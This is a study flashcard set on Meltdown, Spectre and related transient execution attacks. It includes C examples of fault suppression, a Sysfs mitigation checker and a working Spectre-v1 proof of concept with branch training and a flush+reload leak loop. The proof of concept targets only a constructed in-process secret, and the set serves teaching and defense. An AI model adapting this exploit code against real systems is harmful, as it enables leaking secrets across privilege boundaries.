17: Transient execution attacks


Last updated 9:28 AM on 4/30/26

18 Terms

1

Out of order execution

  • Key performance optimisation, alongside speculative execution

  • Hides/minimises latency (eg cache misses, long-latency FPU operations) by executing younger, independent instructions while an older one is still waiting

  • Keeps the execution units in the pipeline busy

  • Leaves data in the cache(!): a load executed early fills a cache line even if the instruction is later squashed and never retires

2

What does out of order execution exploit?

  • In the microarchitecture, instructions can be reordered and executed as soon as their operands are ready

  • Usually no issue when there are no data dependencies between the reordered instructions

  • Results are only committed (retired, ie made architecturally visible) in program order, once all older instructions have completed

3

Common techniques for suppressing faults

  • Custom segfault handlers (catch SIGSEGV, jump back past the faulting load and keep running)

  • Intel’s Transactional Synchronisation Extensions (TSX): a fault inside a transaction aborts the transaction instead of raising an exception

4

Meltdown

  • Reads memory the process is not allowed to access (eg kernel memory): the load faults, but its result is transiently forwarded to dependent instructions before the fault is raised

  • Need to architecturally suppress (or handle) the resulting fault so the attacker process keeps running and can probe the cache side channel afterwards

5

Intel’s Transactional Synchronization Extensions (TSX)

  • ISA extension for hardware transactional memory

  • Allows parallelism via lock elision

  • Memory accesses are bundled in transactions that either commit atomically or abort with all their effects rolled back

  • If a transaction aborts (including because of a fault inside it):

    • Roll back and re-execute the critical section with the real lock (HLE)

    • Jump to the fallback handler given to XBEGIN (RTM)

  • Now disabled by microcode update on desktop CPUs, still available on some Xeon CPUs
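The two fault-suppression techniques listed above (cards 3 and 5), as an added example that is not part of the original card set: a helper that tries to read one byte from an arbitrary address and reports whether the read faulted, first with a custom SIGSEGV/SIGBUS handler and then (only when built with `-mrtm`) inside a TSX/RTM transaction. The "inaccessible" address is a PROT_NONE page the program maps itself, a constructed stand-in for kernel memory, so the demo is harmless to run anywhere; the names `probe_byte_signal`, `probe_byte_rtm` and `demo_probes` are this example's own.

```c
/* Added example: fault suppression via a custom signal handler and via
 * TSX/RTM.  The probed "bad" address is a PROT_NONE page mapped by this
 * program (constructed stand-in, not kernel memory). */
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#ifdef __RTM__
#include <immintrin.h>       /* _xbegin, _xend, _XBEGIN_STARTED */
#endif
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif

static sigjmp_buf probe_env;

/* Technique 1, custom segfault handler: instead of letting the process die,
 * jump back into the probing function.  The faulting load never retires,
 * but whatever it pulled into the cache transiently is still there. */
static void fault_handler(int sig) {
    (void)sig;
    siglongjmp(probe_env, 1);
}

/* Returns 0 and stores the byte in *out, or -1 if the read faulted. */
int probe_byte_signal(const volatile uint8_t *addr, uint8_t *out) {
    struct sigaction sa, old_segv, old_bus;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = fault_handler;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);     /* macOS reports PROT_NONE hits as SIGBUS */

    volatile int rc;
    if (sigsetjmp(probe_env, 1) == 0) {   /* savesigs=1 restores the signal mask after the jump */
        *out = *addr;                     /* may fault */
        rc = 0;
    } else {
        rc = -1;                          /* arrived here from fault_handler */
    }
    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return rc;
}

#ifdef __RTM__
/* Technique 2, TSX/RTM: a fault inside a transaction aborts it silently and
 * execution resumes at _xbegin() with an abort status; no signal is raised. */
int probe_byte_rtm(const volatile uint8_t *addr, uint8_t *out) {
    unsigned status = _xbegin();
    if (status == _XBEGIN_STARTED) {
        *out = *addr;
        _xend();
        return 0;
    }
    return -1;   /* aborted: the load faulted, or TSX is disabled on this CPU */
}
#endif

/* Demo: probe an ordinary readable byte, then a PROT_NONE page.
 * Returns 0 on setup success and fills in the three results. */
int demo_probes(uint8_t *ok_value, int *ok_rc, int *bad_rc) {
    uint8_t readable = 0x41;                       /* constructed, accessible */
    long page = sysconf(_SC_PAGESIZE);
    uint8_t *guard = mmap(NULL, (size_t)page, PROT_NONE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (guard == MAP_FAILED) return -1;
    uint8_t out = 0;
    *ok_rc = probe_byte_signal(&readable, &out);
    *ok_value = out;
    *bad_rc = probe_byte_signal(guard, &out);      /* faults; handler jumps back */
    munmap(guard, (size_t)page);
    return 0;
}

int main(void) {
    uint8_t v = 0;
    int ok = 0, bad = 0;
    if (demo_probes(&v, &ok, &bad) != 0) return 1;
    printf("readable byte: rc=%d value=0x%02x\n", ok, v);
    printf("PROT_NONE page: rc=%d (fault suppressed, process still alive)\n", bad);
    return 0;
}
```

In a real Meltdown attack the signal handler path costs a kernel round trip per faulting load, which is why the TSX variant was attractive: the abort is handled entirely in hardware and the flush+reload probe can start immediately.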

6

Spectre

  • Abuses branch (mis)prediction and speculative execution

    • Access sensitive data transiently

    • Cache side-channel to exfiltrate data

  • A whole class of attacks, not a single bug

    • New variants are still discovered

    • Previously thought mitigated issues turn out to still be exploitable

    • Still an active research topic

7

Spectre-v1 (Spectre-PHT) attack steps

  • Train the conditional branch predictor (pattern history table) by calling the victim repeatedly with an in-bounds x, so the bounds check is predicted as passing

  • Flush the probe array (array2) and the bounds value from the cache, then call the victim with x out of bounds

    • The check mispredicts and the CPU transiently loads array1[x] (the secret byte) and uses it to index array2, pulling one line into the cache before the misprediction is squashed

  • Exfiltrate the secret via the cache side channel by probing array2: the one line that is now cached reveals the byte

    • eg via flush + reload (time the access to each array2 slot; the fast one is the leaked value)
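The three steps above in working code, as an added example that is not part of the original card set: the Spectre-v1 gadget in the shape popularised by the Kocher et al. proof of concept, the attacker's train / mispredict / flush+reload loop, and a hardened copy of the gadget that clamps the index without a branch (the same idea as the Linux kernel's `array_index_nospec`). `array1`, `array2`, the secret string, the 512-byte stride and the 80-cycle hit threshold are constructed for the demo; the leak loop only compiles on x86-64, and whether it actually leaks on a given machine depends on the CPU and its mitigations, so it is kept out of the deterministic part (`index_nospec`).

```c
/* Added example: Spectre-v1 gadget, attacker loop, and index-masking fix.
 * Secret, arrays, stride and threshold are constructed assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#if defined(__x86_64__)
#include <x86intrin.h>          /* _mm_clflush, __rdtscp */
#define HAVE_X86 1
#endif

#define STRIDE 512              /* one array2 cache line per possible byte value */
#define HIT_THRESHOLD 80        /* cycles, assumed; calibrate on the target machine */

unsigned int array1_size = 16;
uint8_t unused1[64];            /* keep array1_size and array1 on separate cache lines */
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t array2[256 * STRIDE];
const char *secret = "Constructed secret for the demo";  /* assumption */
uint8_t temp = 0;               /* sink so the compiler keeps the loads */

/* Vulnerable gadget (step 2).  With the predictor trained on in-bounds x,
 * an out-of-bounds x passes the check transiently: array1[x] is read and
 * used to pull one line of array2 into the cache. */
void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * STRIDE];
}

/* Branchless clamp in the style of Linux's array_index_nospec(): returns x
 * when x < size and 0 otherwise.  (x | (size-1-x)) has its top bit set
 * exactly when x >= size, so the arithmetic shift yields all-ones or 0. */
size_t index_nospec(size_t x, size_t size) {
    unsigned long mask =
        (unsigned long)(~(long)(x | (size - 1UL - x)) >> (sizeof(long) * 8 - 1));
    return x & mask;
}

/* Hardened gadget: even on a misprediction the index reaching array1 is 0. */
void victim_function_nospec(size_t x) {
    if (x < array1_size) {
        x = index_nospec(x, array1_size);
        temp &= array2[array1[x] * STRIDE];
    }
}

#ifdef HAVE_X86
/* Attacker (steps 1 and 3): flush array2, call the victim five times with
 * an in-bounds x to train the branch, once with the malicious x, then time
 * a reload of every array2 slot; the slot that hits is the leaked byte. */
uint8_t leak_byte(size_t malicious_x) {
    int score[256] = {0};
    for (int tries = 0; tries < 100; tries++) {
        for (int i = 0; i < 256; i++)
            _mm_clflush(&array2[i * STRIDE]);
        size_t training_x = tries % array1_size;
        for (int j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);          /* make the bounds check slow to resolve */
            for (volatile int z = 0; z < 100; z++) { }
            /* select malicious_x on every 6th call without a branch the predictor could learn */
            size_t sel = (size_t)(((j % 6) - 1) & ~0xFFFF);
            sel |= sel >> 16;
            size_t x = training_x ^ (sel & (malicious_x ^ training_x));
            victim_function(x);
        }
        for (int i = 0; i < 256; i++) {
            int slot = ((i * 167) + 13) & 255;  /* scrambled order defeats the prefetcher */
            volatile uint8_t *p = &array2[slot * STRIDE];
            unsigned int aux;
            uint64_t t0 = __rdtscp(&aux);
            (void)*p;
            uint64_t dt = __rdtscp(&aux) - t0;
            if (dt <= HIT_THRESHOLD && slot != array1[training_x])
                score[slot]++;
        }
    }
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (score[i] > score[best]) best = i;
    return (uint8_t)best;
}
#endif

int main(void) {
    printf("index_nospec(5,16)=%zu index_nospec(16,16)=%zu\n",
           index_nospec(5, 16), index_nospec(16, 16));
#ifdef HAVE_X86
    /* malicious_x is the offset from array1 to the secret: how Spectre reads past the array */
    size_t malicious_x = (size_t)(secret - (const char *)array1);
    for (size_t i = 0; i < 8; i++)
        printf("%c", leak_byte(malicious_x + i));
    printf("\n");
#endif
    return 0;
}
```

The mask helper is the part worth copying: it replaces the "remove the gadget" hotfix of inserting an `lfence` after every bounds check with a data dependency that costs a few ALU operations and no serialisation, which is why the Linux kernel uses it on hot paths.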

8

Spectre impact

  • Almost every CPU released before 2018 vulnerable

    • Software and microcode mitigations

    • Some mitigations have a high performance impact

9

Newer CPUs

Have hardware mitigations against some variants of Spectre

10

Meltdown is fully mitigated in

Hardware (newer CPUs no longer forward the result of a faulting load); older CPUs rely on the kernel page-table isolation (KPTI) software workaround

11

Spectre hotfixes and workarounds

  • Intermediate solutions deployed after a vulnerability is disclosed

  • Implemented by:

    • Removing particular gadgets used during attacks (eg inserting speculation barriers such as lfence after bounds checks, or masking array indices)

    • Changes to software (compilers, kernels, browsers)

    • Microcode updates to disable features or change instruction behaviour

12

Spectre hotfix advantages

Fast mitigation of specific attack vector

13

Spectre hotfix disadvantages

Performance overhead, and may not fully mitigate the attack class (only the specific vector that was patched)

14

Hardware defenses

  • Take time to develop: the CPU design-to-release cycle takes multiple years

  • Sometimes allow the vulnerability to be removed completely

  • May not be complete (for performance reasons)

15

Systematic defenses

  • Less used in practice

  • High performance overhead

  • Major software changes needed
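Cards 9 to 15 all come down to one question for a running system: which hotfixes, microcode changes and hardware defenses are actually in effect on this host? As an added example that is not part of the original card set, the program below classifies the status lines the Linux kernel exports under `/sys/devices/system/cpu/vulnerabilities/` (one file per issue, each holding a line such as `Not affected`, `Vulnerable`, `Vulnerable: ...` or `Mitigation: ...`). The classifier is exercised on constructed sample lines; `read_vulnerability_dir()` walks the real directory only when it exists, so the program also runs on non-Linux hosts. The function names and the sample lines are this example's own.

```c
/* Added example: classify Linux sysfs CPU-vulnerability status lines and,
 * where the directory exists, check the live host.  Sample lines below are
 * constructed in the sysfs format, not captured from a real machine. */
#include <dirent.h>
#include <stdio.h>
#include <string.h>

enum vuln_status { NOT_AFFECTED, MITIGATED, VULNERABLE, UNKNOWN };

/* Classify one sysfs line.  The prefix decides; text after ':' is detail. */
enum vuln_status classify_status(const char *line) {
    if (strncmp(line, "Not affected", 12) == 0) return NOT_AFFECTED;
    if (strncmp(line, "Mitigation:", 11) == 0)  return MITIGATED;
    if (strncmp(line, "Vulnerable", 10) == 0)   return VULNERABLE;
    return UNKNOWN;
}

const char *status_name(enum vuln_status s) {
    static const char *const names[] = {"not affected", "mitigated", "VULNERABLE", "unknown"};
    return names[s];
}

/* Print a table of (issue, line) pairs and return how many are still
 * vulnerable.  Used for the constructed samples and the live directory. */
int count_vulnerable(const char *const names[], const char *const lines[], int n) {
    int vulnerable = 0;
    for (int i = 0; i < n; i++) {
        enum vuln_status s = classify_status(lines[i]);
        printf("%-22s %-12s %s\n", names[i], status_name(s), lines[i]);
        if (s == VULNERABLE) vulnerable++;
    }
    return vulnerable;
}

/* Live check: read every file in the sysfs directory.  Returns the number
 * of vulnerable entries, or -1 if the directory is not present. */
int read_vulnerability_dir(void) {
    const char *dir = "/sys/devices/system/cpu/vulnerabilities";
    DIR *d = opendir(dir);
    if (!d) return -1;
    int vulnerable = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (e->d_name[0] == '.') continue;
        char path[512], line[256];
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        FILE *f = fopen(path, "r");
        if (!f) continue;
        if (fgets(line, sizeof line, f)) {
            line[strcspn(line, "\n")] = '\0';
            const char *n[1] = { e->d_name }, *l[1] = { line };
            vulnerable += count_vulnerable(n, l, 1);
        }
        fclose(f);
    }
    closedir(d);
    return vulnerable;
}

int main(void) {
    /* Constructed sample lines for a hypothetical host: one hotfix in place,
     * one issue still open, one not affected, one fixed by disabling TSX. */
    static const char *const names[] = { "spectre_v1", "spectre_v2", "meltdown", "tsx_async_abort" };
    static const char *const lines[] = {
        "Mitigation: usercopy/swapgs barriers and __user pointer sanitization",
        "Vulnerable: Retpoline without IBPB",
        "Not affected",
        "Mitigation: TSX disabled",
    };
    printf("constructed sample: %d vulnerable\n", count_vulnerable(names, lines, 4));
    int live = read_vulnerability_dir();
    if (live >= 0) printf("this host: %d vulnerable\n", live);
    return 0;
}
```

A `Mitigation:` line only says that some defense is active for that entry, not that the whole attack class is closed (card 13), so the detail after the colon is worth reading rather than just counting.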

16

Transient execution

  • Changes microarchitectural state

  • Even if results are not used architecturally, it leaves traces in the microarchitecture

  • Attackers can use this to leak information across privilege domains via side channels

17

Spectre type

Speculation based

18

Meltdown type

Exception based